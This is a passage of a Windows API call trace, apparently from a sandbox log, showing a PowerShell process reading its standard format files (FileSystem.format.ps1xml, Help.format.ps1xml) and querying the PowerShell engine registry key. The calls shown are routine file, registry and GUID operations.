	[0812.945] ReadFile (in: hFile=0x2f8, lpBuffer=0x3531ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3531ee8*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.946] ReadFile (in: hFile=0x2f8, lpBuffer=0x3531ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3531ee8*, lpNumberOfBytesRead=0x12d458*=0x119, lpOverlapped=0x0) returned 1
	[0812.946] ReadFile (in: hFile=0x2f8, lpBuffer=0x3531ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3531ee8*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0812.946] CloseHandle (hObject=0x2f8) returned 1
	[0812.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0812.946] SetErrorMode (uMode=0x1) returned 0x1
	[0812.946] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0812.946] SetErrorMode (uMode=0x1) returned 0x1
	[0812.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0812.947] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x2f8) returned 0x0
	[0812.947] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0812.947] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0812.947] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8497b0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0812.947] CoTaskMemFree (pv=0x1b8497b0) 
	[0812.947] RegCloseKey (hKey=0x2f8) returned 0x0
	[0812.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0812.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0812.955] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x9f5c00f1, Data2=0x49d1, Data3=0x4f82, Data4=([0]=0xb7, [1]=0xff, [2]=0xaf, [3]=0xf4, [4]=0xf3, [5]=0x9d, [6]=0xf8, [7]=0xdb))) returned 0x0
	[0812.956] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xdb3cf78e, Data2=0x3d44, Data3=0x4cbb, Data4=([0]=0x8f, [1]=0x9a, [2]=0x94, [3]=0x7f, [4]=0x57, [5]=0x55, [6]=0x86, [7]=0x5c))) returned 0x0
	[0812.956] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x2e4e539f, Data2=0x9624, Data3=0x42f3, Data4=([0]=0xac, [1]=0x75, [2]=0x50, [3]=0x63, [4]=0x1c, [5]=0xa3, [6]=0xca, [7]=0x2))) returned 0x0
	[0812.956] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xa4ca6e1b, Data2=0xfdb1, Data3=0x4bd3, Data4=([0]=0x95, [1]=0xd6, [2]=0xd4, [3]=0x66, [4]=0xb1, [5]=0x32, [6]=0x90, [7]=0xd0))) returned 0x0
	[0812.956] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0812.956] GetFileType (hFile=0x2f8) returned 0x1
	[0812.956] SetErrorMode (uMode=0x1) returned 0x1
	[0812.956] GetFileType (hFile=0x2f8) returned 0x1
	[0812.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.957] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.958] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.960] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.962] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.962] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.962] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.963] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.963] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.966] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.967] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.967] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.967] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.968] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.968] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.968] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.969] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.969] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.969] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.970] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.970] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.971] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.971] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.971] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.972] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.980] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.980] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.980] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.981] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.981] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.981] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.982] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.982] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.982] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.982] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.983] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.983] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.983] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.986] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.986] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.986] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.987] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.987] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0xf37, lpOverlapped=0x0) returned 1
	[0812.987] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d297f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d297f*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0812.987] ReadFile (in: hFile=0x2f8, lpBuffer=0x33d32e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x33d32e0*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0812.988] CloseHandle (hObject=0x2f8) returned 1
	[0812.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0812.988] SetErrorMode (uMode=0x1) returned 0x1
	[0812.988] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0812.988] SetErrorMode (uMode=0x1) returned 0x1
	[0812.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0812.989] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x2f8) returned 0x0
	[0812.989] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0812.989] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0812.989] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8497b0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0812.989] CoTaskMemFree (pv=0x1b8497b0) 
	[0812.989] RegCloseKey (hKey=0x2f8) returned 0x0
	[0812.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0812.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0812.994] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x975a7e32, Data2=0xf9f3, Data3=0x4b99, Data4=([0]=0xa1, [1]=0x55, [2]=0xbe, [3]=0xf9, [4]=0xd7, [5]=0xe1, [6]=0xa5, [7]=0x9))) returned 0x0
	[0812.995] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x791bcd2a, Data2=0x30fc, Data3=0x403d, Data4=([0]=0xa7, [1]=0x87, [2]=0xf5, [3]=0xb9, [4]=0xd4, [5]=0xf8, [6]=0x5b, [7]=0xaf))) returned 0x0
